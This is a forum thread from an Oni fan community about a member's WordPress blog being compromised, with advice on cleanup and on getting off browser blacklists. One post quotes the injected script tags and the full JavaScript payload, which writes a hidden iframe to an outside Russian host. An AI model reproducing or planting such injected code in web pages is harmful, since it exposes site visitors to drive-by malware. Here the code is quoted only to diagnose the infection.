You are not logged in.
Pages: 1
Hey guys, I started a blog here: http://www.codercorner.com/blog/
I'll probably post some Oni-related stuff, from time to time!
- Pierre
Offline
Good to hear back from you. Nice blog, with much insight.
Why don't the boxes in the top-of-page art have collision?
Ghost in the shell, LOL: http://www.codercorner.com/blog/?p=3
Loser has made them bounce off characters as well, BTW.
And fixed something with their animation, not sure what.
Last edited by geyser (02/17/08 11:02)
Behold the power of that which is yet unborn! For the swirling images that flow forth from the Chrysalis are only a shadow of the sleeper's true power.
Offline
Offline
Pierre, if you're reading this: You're blog is still infected. Every page ends like this:
</div>
<script src=http://www.jex5.ru/fgg.js></script><script src=http://www.njep.ru/fgg.js></script></body>
</html>
Both of the scripts have this content:
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://bjxt.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}
The iframe forwards to "http://zvz.cc/forums/8L0/join.upq" where you got a blank site with no source code. (IMO that's even more dangerous, because you can't see what is really going on.)
To avoid the scripts I suggest to add either a <noscript> or a <!-- after the last </div>, because it seems that the virus writes its data in front of the </body>. So it should look like this the next time:
</div>
<!--
<script src=http://www.jex5.ru/fgg.js></script><script src=http://www.njep.ru/fgg.js></script></body>
</html>
I know, that's no valid HTML anymore, but the browsers can live with that, I guess. I've no idea if it will really work. Just try it. Or better: delete the virus if possible.
Last edited by m2 (07/29/08 08:07)
Offline
I know the site is infected, I just didn't have time to clean it properly. I cleaned the HTML pages from the main site but the blog is still infected. I don't really know html / php / web stuff, so I'm not sure what to do about it.
Will look at it ASAP. If you guys have suggestions / ideas, it's welcome.
Offline
I don't really know html / php / web stuff, so I'm not sure what to do about it.
Maybe there's one in your circle of friends who can help you.
You can also explore the wordpress forum:
http://wordpress.org/support/forum/13
http://wordpress.org/support/topic/141041
and:
http://blog.taragana.com/index.php/arch … m-hacking/ (full link says: _http://blog.taragana.com/index.php/archive/detailed-post-mortem-of-a-website-hack-through-wordpress-how-to-protect-your-wordpress-blog-from-hacking/_ )
Don't forget to clean up first. Maybe the virus installed a back door somewhere.
Last edited by m2 (07/29/08 09:07)
Offline
Pierre: install the latest version of Wordpress and you should be safe. Older versions are vulnerable to exploits, injections and such.
Harry | oni.bungie.org
Offline
Hmm, whatever happened to the blog? When I try to go there, it warns me that it's a "Reported Attack Site", and even on my Mac I'm not cocky enough to ignore the warning even though I know that Pierre was having trouble getting his site unlisted from the blacklists and the warning might be obsolete.
So, anyone know any news on the subject? Maybe others aren't even seeing that warning.
Check out the Anniversary Edition Seven at ae.oni2.net!
Offline
I still get this ominous warning from Google when I ask why the site was blocked:
http://safebrowsing.clients.google.com/ … .com/blog/
In short, they claim they still found software infecting their test computers the last time they visited, on 10/28. I wonder if Pierre realizes he is continuing to be blacklisted.
Check out the Anniversary Edition Seven at ae.oni2.net!
Offline
I checked a while ago, it seemed to be ok, but I might be wrong. Anyways, why are you afraid, you are on the "safe" OS?
Iritscen:
Iritscen: it's amazing this program even works
Gumby: i know
Iritscen: and that statement applies to my code, not just yours
Offline
I've just never seen a warning like that before, it creeped me out.
Check out the Anniversary Edition Seven at ae.oni2.net!
Offline
Hey, it looks like the badware alert is gone. Looks like the recent update to the list (which Google flubbed ) seemed to have removed Pierre's domain.
Harry | oni.bungie.org
Offline
Yeah, I saw that too, congrats to Pierre Of course he's thoroughly fed up with his blog by now, but who can blame him?
Check out the Anniversary Edition Seven at ae.oni2.net!
Offline
Pages: 1